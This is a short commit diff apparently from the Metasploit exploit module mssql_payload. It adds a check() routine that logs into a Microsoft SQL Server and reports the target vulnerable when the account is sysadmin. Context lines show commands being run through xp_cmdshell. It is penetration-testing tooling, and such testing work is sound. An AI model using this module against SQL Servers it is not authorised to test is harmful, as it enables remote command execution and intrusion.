Add a check() for mssql_payload
parent
5475cf50aa
commit
51764eb207
|
@ -68,6 +68,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
])
|
])
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
if (not mssql_login_datastore)
|
||||||
|
print_status("Invalid SQL Server credentials")
|
||||||
|
return Exploit::CheckCode::Detected
|
||||||
|
end
|
||||||
|
|
||||||
|
mssql_query("select @@version", true)
|
||||||
|
if mssql_is_sysadmin
|
||||||
|
print_good "User #{datastore['USERNAME']} is a sysadmin"
|
||||||
|
Exploit::CheckCode::Vulnerable
|
||||||
|
else
|
||||||
|
Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
ensure
|
||||||
|
disconnect
|
||||||
|
end
|
||||||
|
|
||||||
# This is method required for the CmdStager to work...
|
# This is method required for the CmdStager to work...
|
||||||
def execute_command(cmd, opts)
|
def execute_command(cmd, opts)
|
||||||
mssql_xpcmdshell(cmd, datastore['VERBOSE'])
|
mssql_xpcmdshell(cmd, datastore['VERBOSE'])
|
||||||
|
|
Loading…
Reference in New Issue